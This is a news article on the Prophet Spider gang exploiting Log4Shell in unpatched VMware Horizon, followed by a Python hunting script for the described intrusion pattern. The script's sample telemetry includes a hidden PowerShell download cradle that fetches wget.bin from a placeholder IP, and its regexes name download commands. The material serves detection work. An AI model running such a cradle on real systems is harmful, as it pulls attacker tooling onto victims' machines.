The Prophet Spider gang uses the Log4Shell vulnerability to target the Tomcat service in unpatched VMware Horizon systems.

A gang of cybercriminals known for breaking into computer systems and selling access to them has been discovered exploiting an Apache Log4j vulnerability, Log4Shell, in unpatched VMware Horizon to plant cryptominers and backdoors on targeted systems.

In a blog published Wednesday, BlackBerry researchers Ryan Gibson, Codi Starks and Will Ikard revealed that Prophet Spider was behind the attacks, which could be reliably detected by monitoring ws_TomcatService.exe, the Tomcat service used by VMware Horizon.

The researchers explained that after exploiting the Log4Shell vulnerability to penetrate a system, the attackers use PowerShell commands to download a second-stage payload. In the case of Prophet Spider, the payloads were primarily cryptocurrency mining software, although in some instances Cobalt Strike beacons, a kind of system backdoor, were also installed on the computers.

One of the indicators that helped pin the attacks to Prophet Spider was its use of the C:\Windows\Temp\7fde folder path to store malicious files, the researchers wrote. The threat actor also downloaded a copy of the wget.bin executable, which has historically been used by the group to get additional files onto infected hosts. The IP address used in the download cradle has also been previously attributed to the group.

Prophet Spider foothold suggests an uptick in exploits

BlackBerry Vice President of Global Services and Technical Operations Tony Lee explains that initial access brokers like Prophet Spider break into computer systems, establish a foothold, then sell that access to another malicious actor, who will perform tasks such as stealing data, moving through the system laterally, or infecting it with ransomware.
“If they find the vulnerability, they’ll exploit it,” he said, “and then wait to see who the highest bidder will be.”

“Now that they have the capability to gain a foothold in systems, I think we’ll see an uptick in Log4j exploitation,” Lee adds.

Lee acknowledged that it was impossible to determine how many systems had been compromised by the group. “They can take anywhere from a couple of weeks to a month to sell access,” he explains. However, he says the BlackBerry Research & Intelligence and Incident Response teams were able to confirm intrusions at multiple organizations.

No individual industry vertical appeared to be in the gang’s crosshairs. “They seem opportunistic,” Lee says. “We haven’t seen a particular vertical being targeted. It’s more along the lines of ‘spray and pray.’”

Many VMware implementations remain unpatched

In their blog post, the BlackBerry researchers noted that the exact number of applications, and their various versions, affected by the Log4j vulnerabilities may never be fully known. Although VMware released a patch and mitigation guidance in December 2021 in response to the vulnerability, they explained, many implementations remain unpatched, leaving them susceptible to exploitation.

“It’s difficult for many organizations to scan and patch all their digital assets, even just the external facing ones,” Lee says. “I see organizations struggling with just identifying their assets. If you can’t identify them, then you certainly can’t scan them.
And if you can’t scan them, then you can’t have an effective vulnerability management program.”
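The detection approach the BlackBerry researchers describe, watching what ws_TomcatService.exe spawns and matching the indicators named in the article (the C:\Windows\Temp\7fde staging folder and the wget.bin downloader), can be expressed as a small hunt over process-creation telemetry. The Python below is an added example and is not code from the article or from BlackBerry. The Sysmon-style records are constructed, the IP address in them is a documentation-range placeholder rather than the actor's real cradle address, and the generic "download cradle" heuristic is an assumption of this example, not something the article states.

```python
"""Hunt for the VMware Horizon / Log4Shell post-exploitation pattern in
process-creation telemetry.  Added example; records below are constructed."""
import re
from dataclasses import dataclass, field

# The Horizon Tomcat service should not be spawning interactive shells.
HORIZON_TOMCAT = "ws_tomcatservice.exe"
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}

# Indicators named in the article, matched case-insensitively on the command line.
STAGING_PATH = re.compile(r"c:\\windows\\temp\\7fde", re.IGNORECASE)
WGET_BIN = re.compile(r"\bwget\.bin\b", re.IGNORECASE)

# Generic PowerShell download-cradle shape.  Hypothetical heuristic of this
# example, not an indicator from the article; only applied to children of Tomcat.
CRADLE = re.compile(
    r"\b(Invoke-WebRequest|DownloadString|DownloadFile|iwr|curl)\b", re.IGNORECASE
)


@dataclass
class Finding:
    record_id: int
    reasons: list = field(default_factory=list)


def basename(path: str) -> str:
    """Last path component, lower-cased, tolerant of either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def evaluate(rec: dict) -> list:
    """Return the names of every rule a single process-creation record trips."""
    reasons = []
    parent = basename(rec.get("ParentImage", ""))
    image = basename(rec.get("Image", ""))
    cmd = rec.get("CommandLine", "")

    if parent == HORIZON_TOMCAT and image in SHELLS:
        reasons.append("horizon_tomcat_spawned_shell")
    if STAGING_PATH.search(cmd):
        reasons.append("staging_path_temp_7fde")
    if WGET_BIN.search(cmd):
        reasons.append("wget_bin_reference")
    if parent == HORIZON_TOMCAT and CRADLE.search(cmd):
        reasons.append("download_cradle_from_tomcat")
    return reasons


def hunt(records) -> list:
    """Evaluate every record; return a Finding for each one that trips a rule."""
    findings = []
    for idx, rec in enumerate(records):
        reasons = evaluate(rec)
        if reasons:
            findings.append(Finding(idx, reasons))
    return findings


# Constructed sample telemetry (Sysmon Event ID 1 style fields).
TOMCAT = r"C:\Program Files\VMware\VMware View\Server\bin\ws_TomcatService.exe"
POWERSHELL = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    # 0: the pattern from the article; 203.0.113.10 is a placeholder address.
    {"ParentImage": TOMCAT, "Image": POWERSHELL,
     "CommandLine": r"powershell -nop -w hidden -c Invoke-WebRequest "
                    r"http://203.0.113.10/wget.bin -OutFile C:\Windows\Temp\7fde\wget.bin"},
    # 1: benign scheduled script launched by the service host; trips nothing.
    {"ParentImage": r"C:\Windows\System32\svchost.exe", "Image": POWERSHELL,
     "CommandLine": r"powershell.exe -File C:\Scripts\inventory.ps1"},
    # 2: Tomcat spawning cmd.exe with no known indicator; still worth a look.
    {"ParentImage": TOMCAT, "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c whoami"},
    # 3: wget.bin referenced from an unrelated parent; IoC match only.
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": POWERSHELL,
     "CommandLine": r"powershell -c Get-Item C:\Users\Public\wget.bin"},
]

if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"record {f.record_id}: {', '.join(f.reasons)}")
```

The parent/child rule is the durable part of this hunt: the staging folder and file name are indicators that the actor can change at will, whereas the Horizon Tomcat service spawning PowerShell or cmd.exe is the behaviour the BlackBerry researchers say reliably exposes the intrusion, which is why record 2 is still surfaced even though it matches no indicator.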